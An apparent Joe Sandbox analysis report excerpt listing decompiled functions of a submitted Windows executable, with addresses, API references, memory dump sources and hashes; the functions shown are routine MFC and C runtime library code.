      • API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
      • String ID:
      • API String ID: 1233893325-0
      • Opcode ID: ed9377c58999389865405ff174118eb386ea11d2aa3ce0932ca9b921947bd29d
      • Instruction ID: fe0b0f743f3f4f936e89f5c90e36c06904b39d6e655eceb953978ebd2237e31a
      • Opcode Fuzzy Hash: ed9377c58999389865405ff174118eb386ea11d2aa3ce0932ca9b921947bd29d
      • Instruction Fuzzy Hash: CF01863224021A67D7219B6E5E8AFEE3B9C9B80F70F150125FA42A71D0DFA4EC064564
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00AB70CD Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 80%
      			E00AB70CD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0xb19870);
				E00AAD340(__ebx, __edi, __esi);
				_t31 = E00AB4284(__ebx, _t35);
				_t15 =  *0xd0d440; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00AB5091(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0xd0d348; // 0x2781600
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0xd0cf20;
								if(__eflags != 0) {
									E00AAB4AB(_t33);
								}
							}
						}
						_t21 =  *0xd0d348; // 0x2781600
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0xd0d348; // 0x2781600
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00AB7168();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E00AACC26(_t29, _t38);
				}
				return E00AAD385(_t33);
			}










      0x00ab70cd
      0x00ab70cd
      0x00ab70cd
      0x00ab70cd
      0x00ab70cf
      0x00ab70d4
      0x00ab70de
      0x00ab70e0
      0x00ab70e8
      0x00ab7109
      0x00ab710f
      0x00ab7113
      0x00ab7116
      0x00ab7119
      0x00ab711f
      0x00ab7121
      0x00ab7123
      0x00ab712c
      0x00ab712e
      0x00ab7130
      0x00ab7136
      0x00ab7139
      0x00ab713e
      0x00ab7136
      0x00ab712e
      0x00ab713f
      0x00ab7144
      0x00ab7147
      0x00ab714d
      0x00ab7151
      0x00ab7151
      0x00ab7157
      0x00ab715e
      0x00ab70f0
      0x00ab70f0
      0x00ab70f0
      0x00ab70f3
      0x00ab70f5
      0x00ab70f7
      0x00ab70f9
      0x00ab70fe
      0x00ab7106

      APIs
      • __getptd.LIBCMT ref: 00AB70D9
        • Part of subcall function 00AB4284: __getptd_noexit.LIBCMT ref: 00AB4287
        • Part of subcall function 00AB4284: __amsg_exit.LIBCMT ref: 00AB4294
      • __amsg_exit.LIBCMT ref: 00AB70F9
      • __lock.LIBCMT ref: 00AB7109
      • InterlockedDecrement.KERNEL32(?), ref: 00AB7126
      • _free.LIBCMT ref: 00AB7139
      • InterlockedIncrement.KERNEL32(02781600), ref: 00AB7151
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
      • String ID:
      • API String ID: 3470314060-0
      • Opcode ID: 8af2df8c078aa3067e5fa3370fb0b5e23298ac0b2d08eea1ea02ccc6779f17e7
      • Instruction ID: 10ed51afbb9635fa37cfd550c7dbb250e8b98a9eb537733e5881db683745a2a3
      • Opcode Fuzzy Hash: 8af2df8c078aa3067e5fa3370fb0b5e23298ac0b2d08eea1ea02ccc6779f17e7
      • Instruction Fuzzy Hash: 8C015635945711ABDB21EFA8A5067DDB768BF85B20F050106F405A73A2CB74AD81CBF2
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009C9ABA Relevance: 9.0, APIs: 6, Instructions: 45windowCOMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 91%
      			E009C9ABA(void* __ecx) {
				void* _t14;
				struct HMENU__* _t15;
				void* _t16;
				struct HMENU__* _t17;
				void* _t18;
				intOrPtr _t21;
				void* _t33;
				void* _t37;
				void* _t38;

				_t27 = __ecx;
				_t37 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x3c)) != 0) {
					__eax = DestroyMenu(__eax);
				}
				_t14 =  *(_t37 + 0x40);
				if(_t14 != 0) {
					FreeResource(_t14);
				}
				_t15 =  *(_t37 + 0x44);
				if(_t15 != 0) {
					DestroyMenu(_t15);
				}
				_t16 =  *(_t37 + 0x48);
				if(_t16 != 0) {
					FreeResource(_t16);
				}
				_t17 =  *(_t37 + 0x4c);
				if(_t17 != 0) {
					DestroyMenu(_t17);
				}
				_t18 =  *(_t37 + 0x50);
				if(_t18 != 0) {
					FreeResource(_t18);
				}
				E009A5510( *((intOrPtr*)(_t37 + 0x84)) - 0x10, _t33);
				E009A5510( *((intOrPtr*)(_t37 + 0x28)) - 0x10, _t33);
				_t27 = _t37;
				_pop(_t37);
				_push(_t37);
				_t38 = _t27;
				_t21 =  *((intOrPtr*)(_t38 + 0x10));
				if(_t21 != 0) {
					_t21 =  *((intOrPtr*)(_t21 + 0x1c))();
				}
				 *(_t38 + 0x1c) =  *(_t38 + 0x1c) & 0x00000000;
				return _t21;
			}












      0x009c9aba
      0x009c9abd
      0x009c9acb
      0x009c9ace
      0x009c9ace
      0x009c9ad0
      0x009c9ad5
      0x009c9ad8
      0x009c9ad8
      0x009c9ade
      0x009c9ae3
      0x009c9ae6
      0x009c9ae6
      0x009c9ae8
      0x009c9aed
      0x009c9af0
      0x009c9af0
      0x009c9af6
      0x009c9afb
      0x009c9afe
      0x009c9afe
      0x009c9b00
      0x009c9b05
      0x009c9b08
      0x009c9b08
      0x009c9b17
      0x009c9b22
      0x009c9b28
      0x009c9b2a
      0x009b0633
      0x009b0634
      0x009b0639
      0x009b063d
      0x009b063f
      0x009b063f
      0x009b0642
      0x009b0647

      APIs
      • DestroyMenu.USER32(?,?,?,009B51FD), ref: 009C9ACE
      • FreeResource.KERNEL32(?,?,?,009B51FD), ref: 009C9AD8
      • DestroyMenu.USER32(?,?,?,009B51FD), ref: 009C9AE6
      • FreeResource.KERNEL32(?,?,?,009B51FD), ref: 009C9AF0
      • DestroyMenu.USER32(?,?,?,009B51FD), ref: 009C9AFE
      • FreeResource.KERNEL32(?,?,?,009B51FD), ref: 009C9B08
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: DestroyFreeMenuResource
      • String ID:
      • API String ID: 2790856715-0
      • Opcode ID: e9d4b7e4b9a13d6b033fa92e3e9cd88ae46e1e3307cf63488c4b89cf342b7bbc
      • Instruction ID: cf3d2f1f0c4c5d960c537fa641df84a8ccb9c9a4ae047a9f953a537983bc010c
      • Opcode Fuzzy Hash: e9d4b7e4b9a13d6b033fa92e3e9cd88ae46e1e3307cf63488c4b89cf342b7bbc
      • Instruction Fuzzy Hash: 6801F671B007119BDB24EBBE9998F1BB7EDAF88750305092EB543D3A61DE70E800CA61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AFF05 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 243COMMON
      Download Yara Rule
      C-Code - Quality: 94%
      			E009AFF05(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v52;
				signed int _v56;
				void* __ebp;
				intOrPtr _t127;
				void* _t133;
				intOrPtr _t135;
				signed int _t145;
				signed int _t146;
				signed int _t178;
				signed int _t180;
				signed int _t182;
				signed int _t184;
				signed int _t186;
				signed int _t190;
				void* _t193;
				intOrPtr _t194;
				signed int _t204;

				_t193 = __ecx;
				_t127 = E009BD77F(__ebx, __edi, __esi, __eflags);
				_v8 = _t127;
				_t3 =  &_a4;
				 *_t3 = _a4 &  !( *(_t127 + 0x18));
				if( *_t3 == 0) {
					return 1;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t204 = 0;
				E00AAB3F0( &_v56, 0, 0x28);
				_v52 = DefWindowProcA;
				_t133 = E009BD77F(__ebx, 0, 0, __eflags);
				__eflags = _a4 & 0x00000001;
				_v40 =  *((intOrPtr*)(_t133 + 8));
				_t135 =  *0xd0fd48; // 0x10003
				_t190 = 8;
				_v32 = _t135;
				_v16 = _t190;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0xb;
					_v20 = "AfxWnd100s";
					_t186 = E009AFBA4(_t190, _t193, 0, 0, __eflags);
					__eflags = _t186;
					if(_t186 != 0) {
						_t204 = 1;
						__eflags = 1;
					}
				}
				__eflags = _a4 & 0x00000020;
				if(__eflags != 0) {
					_v56 = _v56 | 0x0000008b;
					_push( &_v56);
					_v20 = "AfxOleControl100s";
					_t184 = E009AFBA4(_t190, _t193, 0, _t204, __eflags);
					__eflags = _t184;
					if(_t184 != 0) {
						_t204 = _t204 | 0x00000020;
						__eflags = _t204;
					}
				}
				__eflags = _a4 & 0x00000002;
				if(__eflags != 0) {
					_push( &_v56);
					_v56 = 0;
					_v20 = "AfxControlBar100s";
					_v28 = 0x10;
					_t182 = E009AFBA4(_t190, _t193, 0, _t204, __eflags);
					__eflags = _t182;
					if(_t182 != 0) {
						_t204 = _t204 | 0x00000002;
						__eflags = _t204;
					}
				}
				__eflags = _a4 & 0x00000004;
				if(__eflags != 0) {
					_v56 = _t190;
					_v28 = 0;
					_t180 = E009AFEC1(_t193, __eflags,  &_v56, "AfxMDIFrame100s", 0x7a01);
					__eflags = _t180;
					if(_t180 != 0) {
						_t204 = _t204 | 0x00000004;
						__eflags = _t204;
					}
				}
				__eflags = _a4 & _t190;
				if(__eflags != 0) {
					_v56 = 0xb;
					_v28 = 6;
					_t178 = E009AFEC1(_t193, __eflags,  &_v56, "AfxFrameOrView100s", 0x7a02);
					__eflags = _t178;
					if(_t178 != 0) {
						_t204 = _t204 | _t190;
						__eflags = _t204;
					}
				}
				__eflags = _a4 & 0x00000010;
				if(__eflags != 0) {
					_v12 = 0xff;
					_t204 = _t204 | E009AD421(_t190, _t193, _t204, __eflags,  &_v16, 0x3fc0);
					_t48 =  &_a4;
					 *_t48 = _a4 & 0xffffc03f;
					__eflags =  *_t48;
				}
				__eflags = _a4 & 0x00000040;
				if(__eflags != 0) {
					_v12 = 0x10;
					_t204 = _t204 | E009AD421(_t190, _t193, _t204, __eflags,  &_v16, 0x40);
					__eflags = _t204;
				}
				__eflags = _a4 & 0x00000080;
				if(__eflags != 0) {
					_v12 = 2;
					_t204 = _t204 | E009AD421(_t190, _t193, _t204, __eflags,  &_v16, 0x80);
					__eflags = _t204;
				}
				__eflags = _a4 & 0x00000100;
				if(__eflags != 0) {
					_v12 = _t190;
					_t204 = _t204 | E009AD421(_t190, _t193, _t204, __eflags,  &_v16, 0x100);
					__eflags = _t204;
				}
				__eflags = _a4 & 0x00000200;
				if(__eflags != 0) {
					_v12 = 0x20;
					_t204 = _t204 | E009AD421(_t190, _t193, _t204, __eflags,  &_v16, 0x200);
					__eflags = _t204;
				}
				__eflags = _a4 & 0x00000400;
				if(__eflags != 0) {
					_v12 = 1;
					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x400);
					__eflags = _t204;
				}
				__eflags = _a4 & 0x00000800;
				if(__eflags != 0) {
					_v12 = 0x40;
					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x800);
					__eflags = _t204;
				}
				__eflags = _a4 & 0x00001000;
				if(__eflags != 0) {
					_v12 = 4;
					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x1000);
					__eflags = _t204;
				}
				__eflags = _a4 & 0x00002000;
				if(__eflags != 0) {
					_v12 = 0x80;
					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x2000);
					__eflags = _t204;
				}
				__eflags = _a4 & 0x00004000;
				if(__eflags != 0) {
					_v12 = 0x800;
					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x4000);
					__eflags = _t204;
				}
				__eflags = _a4 & 0x00008000;
				if(__eflags != 0) {
					_v12 = 0x400;
					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x8000);
					__eflags = _t204;
				}
				__eflags = _a4 & 0x00010000;
				if(__eflags != 0) {
					_v12 = 0x200;
					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x10000);
					__eflags = _t204;
				}
				__eflags = _a4 & 0x00020000;
				if(__eflags != 0) {
					_v12 = 0x100;
					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x20000);
					__eflags = _t204;
				}
				__eflags = _a4 & 0x00040000;
				if(__eflags != 0) {
					_v12 = 0x8000;
					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x40000);
					__eflags = _t204;
				}
				__eflags = _a4 & 0x00080000;
				if(__eflags != 0) {
					_v12 = 0x1000;
					_t204 = _t204 | E009AD421(0x400, _t193, _t204, __eflags,  &_v16, 0x80000);
					__eflags = _t204;
				}
				_t194 = _v8;
				 *(_t194 + 0x18) =  *(_t194 + 0x18) | _t204;
				_t145 =  *(_t194 + 0x18);
				__eflags = (_t145 & 0x00003fc0) - 0x3fc0;
				if((_t145 & 0x00003fc0) == 0x3fc0) {
					_t145 = _t145 | 0x00000010;
					 *(_t194 + 0x18) = _t145;
					__eflags = _t204;
				}
				asm("sbb eax, eax");
				_t146 = _t145 + 1;
				__eflags = _t146;
				return _t146;
			}



























      0x009aff05
      0x009aff0d
      0x009aff12
      0x009aff1a
      0x009aff1a
      0x009aff1d
      0x00000000
      0x009aff21
      0x009aff27
      0x009aff28
      0x009aff29
      0x009aff33
      0x009aff35
      0x009aff42
      0x009aff45
      0x009aff4a
      0x009aff53
      0x009aff56
      0x009aff5b
      0x009aff5c
      0x009aff5f
      0x009aff62
      0x009aff67
      0x009aff68
      0x009aff6f
      0x009aff76
      0x009aff7b
      0x009aff7d
      0x009aff7f
      0x009aff7f
      0x009aff7f
      0x009aff7d
      0x009aff80
      0x009aff84
      0x009aff86
      0x009aff90
      0x009aff91
      0x009aff98
      0x009aff9d
      0x009aff9f
      0x009affa1
      0x009affa1
      0x009affa1
      0x009aff9f
      0x009affa4
      0x009affa8
      0x009affad
      0x009affae
      0x009affb1
      0x009affb8
      0x009affbf
      0x009affc4
      0x009affc6
      0x009affc8
      0x009affc8
      0x009affc8
      0x009affc6
      0x009affcb
      0x009affcf
      0x009affdf
      0x009affe2
      0x009affe5
      0x009affea
      0x009affec
      0x009affee
      0x009affee
      0x009affee
      0x009affec
      0x009afff1
      0x009afff4
      0x009b0004
      0x009b000b
      0x009b0012
      0x009b0017
      0x009b0019
      0x009b001b
      0x009b001b
      0x009b001b
      0x009b0019
      0x009b001d
      0x009b0021
      0x009b002c
      0x009b0038
      0x009b003a
      0x009b003a
      0x009b003a
      0x009b003a
      0x009b0041
      0x009b0045
      0x009b004d
      0x009b0059
      0x009b0059
      0x009b0059
      0x009b005b
      0x009b005f
      0x009b006a
      0x009b0076
      0x009b0076
      0x009b0076
      0x009b007d
      0x009b0080
      0x009b0087
      0x009b008f
      0x009b008f
      0x009b008f
      0x009b0096
      0x009b0099
      0x009b00a0
      0x009b00ac
      0x009b00ac
      0x009b00ac
      0x009b00b3
      0x009b00b6
      0x009b00bd
      0x009b00c9
      0x009b00c9
      0x009b00c9
      0x009b00d0
      0x009b00d3
      0x009b00da
      0x009b00e6
      0x009b00e6
      0x009b00e6
      0x009b00ed
      0x009b00f0
      0x009b00f7
      0x009b0103
      0x009b0103
      0x009b0103
      0x009b010a
      0x009b010d
      0x009b0114
      0x009b0120
      0x009b0120
      0x009b0120
      0x009b0127
      0x009b012a
      0x009b0131
      0x009b0139
      0x009b0139
      0x009b0139
      0x009b0140
      0x009b0143
      0x009b014a
      0x009b0152
      0x009b0152
      0x009b0152
      0x009b0159
      0x009b015c
      0x009b0163
      0x009b016f
      0x009b016f
      0x009b016f
      0x009b0176
      0x009b0179
      0x009b0180
      0x009b018c
      0x009b018c
      0x009b018c
      0x009b0193
      0x009b0196
      0x009b019d
      0x009b01a5
      0x009b01a5
      0x009b01a5
      0x009b01ac
      0x009b01af
      0x009b01b6
      0x009b01c2
      0x009b01c2
      0x009b01c2
      0x009b01c4
      0x009b01c7
      0x009b01ca
      0x009b01d6
      0x009b01d8
      0x009b01da
      0x009b01dd
      0x009b01e0
      0x009b01e0
      0x009b01ec
      0x009b01ef
      0x009b01ef
      0x00000000

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: _memset
      • String ID: @$@$AfxFrameOrView100s$AfxMDIFrame100s
      • API String ID: 2102423945-3695979934
      • Opcode ID: 2933d07ff2458276ca76ffb3d926c69a8dde461d60a461da963546c0bbdf2b34
      • Instruction ID: 93df32760495255fc17ad047bf67f886fb37701850414a97a766959ac12ca7ed
      • Opcode Fuzzy Hash: 2933d07ff2458276ca76ffb3d926c69a8dde461d60a461da963546c0bbdf2b34
      • Instruction Fuzzy Hash: 50913EB2C01219BEDB50DFE8C585BDEBBFCAF49344F208165F909E6191E7749A44CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B07EF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON
      Download Yara Rule
      C-Code - Quality: 80%
      			E009B07EF(void* __edx) {
				signed int _v8;
				void _v136;
				int _v140;
				int _v144;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				unsigned int _t23;
				char* _t35;
				struct HBITMAP__* _t37;
				unsigned int _t40;
				signed short _t42;
				void* _t46;
				int _t47;
				unsigned int _t49;
				void* _t52;
				signed char* _t53;
				signed int _t58;
				void* _t59;
				signed int _t62;
				void* _t63;
				void* _t64;
				signed int _t66;
				signed int _t68;

				_t52 = __edx;
				_t66 = _t68;
				_t21 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t21 ^ _t66;
				_t23 = GetMenuCheckMarkDimensions();
				_t47 = _t23;
				_t40 = _t23 >> 0x10;
				_v144 = _t47;
				_v140 = _t40;
				if(_t47 <= 4 || _t40 <= 5) {
					E009B8782(_t47);
				}
				if(_t47 > 0x20) {
					_t47 = 0x20;
					_v144 = _t47;
				}
				asm("cdq");
				_t62 = _t47 + 0xf >> 4;
				_t58 = (_t47 - 4 - _t52 >> 1) + (_t62 << 4) - _t47;
				if(_t58 > 0xc) {
					_t58 = 0xc;
				}
				if(_t40 > 0x20) {
					_t40 = 0x20;
					_v140 = _t40;
				}
				E00AAB3F0( &_v136, 0xff, 0x80);
				_t35 = _t66 + (_t40 - 6 >> 1) * _t62 * 2 - 0x84;
				_t53 = 0xad8e18;
				_t63 = _t62 + _t62;
				_v148 = 5;
				do {
					_t42 = ( *_t53 & 0x000000ff) << _t58;
					_t53 =  &(_t53[1]);
					_t49 =  !_t42 & 0x0000ffff;
					 *_t35 = _t49 >> 8;
					 *(_t35 + 1) = _t49;
					_t35 = _t35 + _t63;
					_t15 =  &_v148;
					 *_t15 = _v148 - 1;
				} while ( *_t15 != 0);
				_t37 = CreateBitmap(_v144, _v140, 1, 1,  &_v136);
				_pop(_t59);
				_pop(_t64);
				 *0xd0fd58 = _t37;
				_pop(_t46);
				if(_t37 == 0) {
					 *0xd0fd58 = _t37;
				}
				return E00AAB46A(_t37, _t46, _v8 ^ _t66, _t53, _t59, _t64);
			}






























      0x009b07ef
      0x009b07f2
      0x009b07fa
      0x009b0801
      0x009b0807
      0x009b080d
      0x009b0813
      0x009b0816
      0x009b081c
      0x009b0825
      0x009b082c
      0x009b082c
      0x009b0834
      0x009b0838
      0x009b0839
      0x009b0839
      0x009b0842
      0x009b0848
      0x009b0856
      0x009b085b
      0x009b085f
      0x009b085f
      0x009b0863
      0x009b0867
      0x009b0868
      0x009b0868
      0x009b087f
      0x009b088f
      0x009b0896
      0x009b089b
      0x009b089d
      0x009b08a7
      0x009b08ac
      0x009b08af
      0x009b08b3
      0x009b08bb
      0x009b08bd
      0x009b08c0
      0x009b08c2
      0x009b08c2
      0x009b08c2
      0x009b08e1
      0x009b08e7
      0x009b08e8
      0x009b08e9
      0x009b08ee
      0x009b08f1
      0x009b08ff
      0x009b08ff
      0x009b090f

      APIs
      • GetMenuCheckMarkDimensions.USER32 ref: 009B0807
      • _memset.LIBCMT ref: 009B087F
      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 009B08E1
      • LoadBitmapW.USER32 ref: 009B08F9
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
      • String ID:
      • API String ID: 4271682439-3916222277
      • Opcode ID: cd8d8744e6de4a6456aa59ed6bcd3f35d6e2168ccde54643fbf9f7a0076a22d1
      • Instruction ID: 98ebdcc890acd6bd2a50575ac4225843b5f6d99891cd2cd26bd40f550d28aa63
      • Opcode Fuzzy Hash: cd8d8744e6de4a6456aa59ed6bcd3f35d6e2168ccde54643fbf9f7a0076a22d1
      • Instruction Fuzzy Hash: B1314971A002189FEB20CF689D85BA977B8FB84310F5540BAF549D7282CE358E44CBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B4757 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 61COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009B4757(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E009AA693(__ecx, __eflags, _t26) == 0) {
					_t10 = E009AD852(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E009AB37E(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E009BBADB(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x88);
					if( *(_t10 + 0x88) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}













      0x009b4757
      0x009b4757
      0x009b475e
      0x009b4762
      0x009b476b
      0x009b4777
      0x009b477c
      0x009b477e
      0x009b478d
      0x009b478d
      0x009b4794
      0x009b47f2
      0x00000000
      0x009b47f5
      0x009b4796
      0x009b4799
      0x009b479c
      0x009b47a3
      0x009b47ad
      0x009b47af
      0x00000000
      0x00000000
      0x009b47b8
      0x009b47bd
      0x009b47bf
      0x00000000
      0x00000000
      0x009b47c6
      0x009b47cc
      0x009b47ce
      0x009b47db
      0x009b47e7
      0x00000000
      0x009b47e7
      0x009b47d1
      0x009b47d7
      0x009b47d9
      0x00000000
      0x00000000
      0x00000000
      0x009b47d9
      0x009b479e
      0x009b47a1
      0x00000000
      0x00000000
      0x00000000
      0x009b47a1
      0x009b4780
      0x009b4787
      0x00000000
      0x00000000
      0x00000000
      0x009b4789
      0x009b476d
      0x00000000

      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
